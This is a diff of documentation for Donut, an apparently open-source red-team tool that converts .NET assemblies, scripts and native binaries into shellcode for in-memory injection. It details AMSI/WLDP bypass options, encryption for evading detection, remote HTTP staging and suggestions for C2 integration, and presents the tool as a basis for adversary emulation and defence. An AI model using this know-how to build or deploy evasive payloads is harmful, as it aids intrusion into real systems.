191 <td><var>name</var></td>
192 <td>Module name for HTTP staging. If entropy is enabled, one is generated randomly.</td>
193 </tr>
194
195 <tr>
196 <td><strong>-o</strong></td>
197 <td><var>path</var></td>
198 <td>Specifies where Donut should save the loader. Default is "loader.bin" in the current directory.</td>
199 </tr>
200
201 <tr>
202 <td><strong>-p</strong></td>
203 <td><var>parameters</var></td>
204 <td>Optional parameters/command line inside quotations for DLL method/function or EXE.</td>
205 </tr>
206
207 <tr>
208 <td><strong>-r</strong></td>
209 <td><var>version</var></td>
210 <td>CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.</td>
211 </tr>
212
213 <tr>
214 <td><strong>-s</strong></td>
215 <td><var>server</var></td>
216 <td>URL for the HTTP server that will host a Donut module. Credentials may be provided in the following format: <pre>https://username:[email protected]/</pre></td>
217 </tr>
218
219 <tr>
220 <td><strong>-t</strong></td>
221 <td></td>
222 <td>Run the entrypoint of an unmanaged/native EXE as a thread and wait for thread to end.</td>
223 </tr>
224
225 <tr>
226 <td><strong>-w</strong></td>
227 <td></td>
228 <td>Command line is passed to unmanaged DLL function in UNICODE format. (default is ANSI)</td>
229 </tr>
230
231 <tr>
232 <td><strong>-x</strong></td>
233 <td><var>option</var></td>
234 <td>Determines how the loader should exit. 1=exit thread (default), 2=exit process.</td>
235 </tr>
236
237 <tr>
238 <td><strong>-y</strong></td>
239 <td><var>addr</var></td>
240 <td>Creates a new thread for the loader and continues execution at the address of host process.</td>
241 </tr>
242
243 <tr>
244 <td><strong>-z</strong></td>
245 <td><var>engine</var></td>
246 <td>Pack/Compress the input file. 1=None, 2=aPLib, 3=LZNT1, 4=Xpress, 5=Xpress Huffman. Currently, the last three are only supported on Windows.</td>
247 </tr>
248 </table>
249
250 <h3 id="requirements">Payload Requirements</h2>
251
252 <p>There are some specific requirements that your payload must meet in order for Donut to successfully load it.</p>
253
254 <h3 id="requirements-dotnet">.NET Assemblies</h2>
255
256 <ul>
257 <li>The entry point method must only take strings as arguments, or take no arguments.</li>
258 <li>The entry point method must be marked as public and static.</li>
259 <li>The class containing the entry point method must be marked as public.</li>
260 <li>The Assembly must NOT be a Mixed Assembly (contain both managed and native code).</li>
261 <li>As such, the Assembly must NOT contain any Unmanaged Exports.</li>
262 </ul>
263
264 <h3 id="requirements-native">Native EXE/DLL</h2>
265
266 <ul>
267 <li>Binaries built with Cygwin are unsupported.</li>
268 </ul>
269
270 <p>Cygwin executables use initialization routines that expect the host process to be running from disk. If executing from memory, the host process will likely crash.</p>
271
272 <h3 id="requirements-dotnet">Unmanaged DLLs</h2>
273
274 <ul>
275 <li>A user-specified entry point method must only take a string as an argument, or take no arguments. We have provided an <a href="https://github.com/TheWover/donut/blob/master/DonutTest/dlltest.c/">example</a>.</li>
276 </ul>
277
278 <h2 id="subproj">5. Subprojects</h2>
279
280 <p>There are four companion projects provided with donut:</p>
281
282 <table border="1">
283 <tr>
284 <th>Tool</th>
285 <th>Description</th>
286 </tr>
287 <tr>
288 <td>DemoCreateProcess</td>
289 <td>A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.</td>
290 </tr>
291 <tr>
292 <td>DonutTest</td>
293 <td>A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string.</td>
294 </tr>
295 <tr>
296 <td>ModuleMonitor</td>
297 <td>A proof-of-concept tool that detects CLR injection as it is done by tools such as Donut and Cobalt Strike's execute-assembly.</td>
298 </tr>
299 <tr>
300 <td>ProcessManager</td>
301 <td>A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. </td>
302 </tr>
303 </table>
304
305 <h2 id="dev">6. Developing with Donut</h2>
306
307 <p>You may want to add support for more types of payloads, change our feature set, or integrate Donut into your existing tooling. We have provided <a href="https://github.com/TheWover/donut/blob/master/docs/devnotes.md">developer documentation</a>. Additional features are left as exercises to the reader. Our suggestions:</p>
308
309 <ul>
310 <li>Add environmental keying.</li>
311 <li>Make Donut polymorphic by obfuscating the loader every time shellcode is generated.</li>
312 <li>Integrate Donut as a module into your favorite RAT/C2 Framework.</li>
313 </ul>
314
315 <h2 id="qad">7. Questions and Discussion</h2>
316
317 <p>If you have any questions or comments about Donut. Join the #Donut channel in the <a href="https://bloodhoundgang.herokuapp.com/">BloodHound Gang Slack</a></p>
318
319 <h2 id="disclaimer">8. Disclaimer</h2>
320
321 <p>We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection and in-memory loading through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct. In the event EDR or AV products are capable of detecting Donut via signatures or behavioral patterns, we will not update Donut to counter signatures or detection methods. To avoid being offended, please do not ask.</p>
+106
-4
docs/2019-08-21-Python_Extension.md less more
3434
3535 The ```donut``` module exposes only one function ```create()```, which is used to generate shellcode and accepts both positional and keyword arguments.
3636
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS/XSL file to turn into shellcode.
37 The only required parameter the ```create()``` function needs is the ```file``` argument which accepts a path to the .NET EXE/DLL or VBS/JS file to turn into shellcode.
3838
3939 ```python
4040 import donut
4242 shellcode = donut.create(
4343 file='naga.exe', # .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory
4444 url='http://127.0.0.1', # HTTP server that will host the donut module
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
45 arch=1, # Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default)
46 bypass=3, # Bypass AMSI/WLDP : 1=none, 2=abort on fail, 3=continue on fail.(default)
4747 cls='namespace.class', # Optional class name. (required for .NET DLL)
4848 method='method', # Optional method or API name for DLL. (method is required for .NET DLL)
49 params='arg1,arg2', # Optional parameters or command line, separated by comma or semi-colon.
49 params='arg1 arg2', # Optional parameters or command line.
5050 runtime='version', # CLR runtime version. MetaHeader used by default or v4.0.30319 if none available
5151 appdomain='name' # AppDomain name to create for .NET. Randomly generated by default.
5252 )
5353 ```
5454
55 ## Keywords
56
57 The following table lists key words for the create method.
58
59 <table>
60 <tr>
61 <th>Keyword</th>
62 <th>Type</th>
63 <th>Description</th>
64 </tr>
65 <tr>
66 <td>file</td>
67 <td>String</td>
68 <td>The path of file to execute in memory. VBS/JS/EXE/DLL files are supported.</td>
69 </tr>
70 <tr>
71 <td>arch</td>
72 <td>Integer</td>
73 <td>Indicates the type of assembly code to generate. 1=<code>DONUT_ARCH_X86</code> and 2=<code>DONUT_ARCH_X64</code> are self-explanatory. 3=<code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both X86 and AMD64. ARM64 will be supported at some point.</td>
74 </tr>
75 <tr>
76 <td>bypass</td>
77 <td>Integer</td>
78 <td>Specifies behaviour of the code responsible for bypassing AMSI and WLDP. The current options are 1=<code>DONUT_BYPASS_NONE</code> which indicates that no attempt be made to disable AMSI or WLDP. 2=<code>DONUT_BYPASS_ABORT</code> indicates that failure to disable should result in aborting execution of the module. 3=<code>DONUT_BYPASS_CONTINUE</code> indicates that even if AMSI/WDLP bypasses fail, the shellcode will continue with execution.</td>
79 </tr>
80 <tr>
81 <td>compress</td>
82 <td>Integer</td>
83 <td>Indicates if the input file should be compressed. Available engines are 1=<code>DONUT_COMPRESS_NONE</code>, 2=<code>DONUT_COMPRESS_APLIB</code> to use the <a href="http://ibsensoftware.com/products_aPLib.html">aPLib</a> algorithm. For builds on Windows, the <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-rtlcompressbuffer">RtlCompressBuffer</a> API is available and supports 3=<code>DONUT_COMPRESS_LZNT1</code>, 4=<code>DONUT_COMPRESS_XPRESS</code> and 5=<code>DONUT_COMPRESS_XPRESS_HUFF</code>.</td>
84 </tr>
85 <tr>
86 <td>entropy</td>
87 <td>Integer</td>
88 <td>Indicates whether Donut should use entropy and/or encryption for the loader to help evade detection. Available options are 1=<code>DONUT_ENTROPY_NONE</code>, 2=<code>DONUT_ENTROPY_RANDOM</code>, which generates random strings and 3=<code>DONUT_ENTROPY_DEFAULT</code> that combines <code>DONUT_ENTROPY_RANDOM</code> with symmetric encryption.</td>
89 </tr>
90 <tr>
91 <td>format</td>
92 <td>Integer</td>
93 <td>Specifies the output format for the shellcode loader. Supported formats are 1=<code>DONUT_FORMAT_BINARY</code>, 2=<code>DONUT_FORMAT_BASE64</code>, 3=<code>DONUT_FORMAT_RUBY</code>, 4=<code>DONUT_FORMAT_C</code>, 5=<code>DONUT_FORMAT_PYTHON</code>, 6=<code>DONUT_FORMAT_POWERSHELL</code>, 7=<code>DONUT_FORMAT_CSHARP</code> and 8=<code>DONUT_FORMAT_HEX</code>. On Windows, the base64 string is copied to the clipboard.</td>
94 </tr>
95 <tr>
96 <td>exit_opt</td>
97 <td>Integer</td>
98 <td>When the shellcode ends, <code>RtlExitUserThread</code> is called, which is the default behaviour. Use 2=<code>DONUT_OPT_EXIT_PROCESS</code> to terminate the host process via the <code>RtlExitUserProcess</code> API.</td>
99 </tr>
100 <tr>
101 <td>thread</td>
102 <td>Integer</td>
103 <td>If the file is an unmanaged EXE, the loader will run the entrypoint as a thread. The loader also attempts to intercept calls to exit-related API stored in the Import Address Table by replacing those pointers with the address of the <code>RtlExitUserThread</code> API. However, hooking via IAT is generally unreliable and Donut may use code splicing / hooking in the future.</td>
104 </tr>
105 <tr>
106 <td>oep</td>
107 <td>String</td>
108 <td>Tells the loader to create a new thread before continuing execution at the OEP provided by the user. Address should be in hexadecimal format.</td>
109 </tr>
110 <tr>
111 <td>output</td>
112 <td>String</td>
113 <td>The path of where to save the shellcode/loader. Default is "loader.bin".</td>
114 </tr>
115 <tr>
116 <td>runtime</td>
117 <td>String</td>
118 <td>The CLR runtime version to use for a .NET assembly. If none is provided, Donut will try reading from the PE's COM directory. If that fails, v4.0.30319 is used by default.</td>
119 </tr>
120 <tr>
121 <td>appdomain</td>
122 <td>String</td>
123 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
124 </tr>
125 <tr>
126 <td>cls</td>
127 <td>String</td>
128 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</td>
129 </tr>
130 <tr>
131 <td>method</td>
132 <td>String</td>
133 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
134 </tr>
135 <tr>
136 <td>params</td>
137 <td>String</td>
138 <td>List of parameters for the .NET method or DLL function. For unmanaged EXE files, a 4-byte string is generated randomly to act as the module name. If entropy is disabled, this will be "AAAA"</td>
139 </tr>
140 <tr>
141 <td>unicode</td>
142 <td>Integer</td>
143 <td>By default, the <code>params</code> string is passed to an unmanaged DLL function as-is, in ANSI format. If set, param is converted to UNICODE.</td>
144 </tr>
145 <tr>
146 <td>url or server</td>
147 <td>String</td>
148 <td>If the instance type is <code>DONUT_INSTANCE_HTTP</code>, this should contain the server and path of where module will be stored. e.g: https://www.staging-server.com/modules/</td>
149 </tr>
150 <tr>
151 <td>modname</td>
152 <td>String</td>
153 <td>If the type is <code>DONUT_INSTANCE_HTTP</code>, this will contain the name of the module for where to save the contents of <code>mod</code> to disk. If none is provided by the user, it will be generated randomly. If entropy is disabled, it will be set to "AAAAAAAA"</td>
154 </tr>
155 </table>
156
55157 ## Author
56158
57159 The Python extension was written by [@byt3bl33d3r](https://twitter.com/byt3bl33d3r)
+0
-511
docs/api.html less more
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
